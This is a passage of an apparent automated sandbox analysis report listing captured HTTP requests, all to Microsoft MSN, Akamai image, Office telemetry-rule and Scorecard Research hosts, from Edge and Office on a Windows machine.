Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1731526789129&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=49639501e5034f4f90986f967aa67a67&activityId=49639501e5034f4f90986f967aa67a67&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=25B04BE6D989657B07C35ED0D82864B0; _EDGE_S=F=1&SID=0CD01B9D75B56BB02F0F0EAB74CB6A16; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=25B04BE6D989657B07C35ED0D82864B0&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=6686581979505309747&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308\|10837393&bcnt=1\|1&asid=46cff38a0542443fd172772104d0360f HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=25B04BE6D989657B07C35ED0D82864B0; _EDGE_S=F=1&SID=0CD01B9D75B56BB02F0F0EAB74CB6A16; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msBhw.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1t99ka.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /b2?rn=1731526789129&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=25B04BE6D989657B07C35ED0D82864B0&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1A9e16189b226a838668ba11731526791; XID=1A9e16189b226a838668ba11731526791
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msOZa.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msFQA.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA12sf7A.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=25B04BE6D989657B07C35ED0D82864B0&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=6686581979505309747&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=c8c8e1b4847d4ccdae63235c9cc8fa40 HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=25B04BE6D989657B07C35ED0D82864B0; _EDGE_S=F=1&SID=0CD01B9D75B56BB02F0F0EAB74CB6A16; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1731526789129&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=49639501e5034f4f90986f967aa67a67&activityId=49639501e5034f4f90986f967aa67a67&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=227081EBCC284A41B44350BACC660DC9&MUID=25B04BE6D989657B07C35ED0D82864B0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=25B04BE6D989657B07C35ED0D82864B0; _EDGE_S=F=1&SID=0CD01B9D75B56BB02F0F0EAB74CB6A16; _EDGE_V=1; SM=T; _C_ETH=1
Source: global traffic	HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
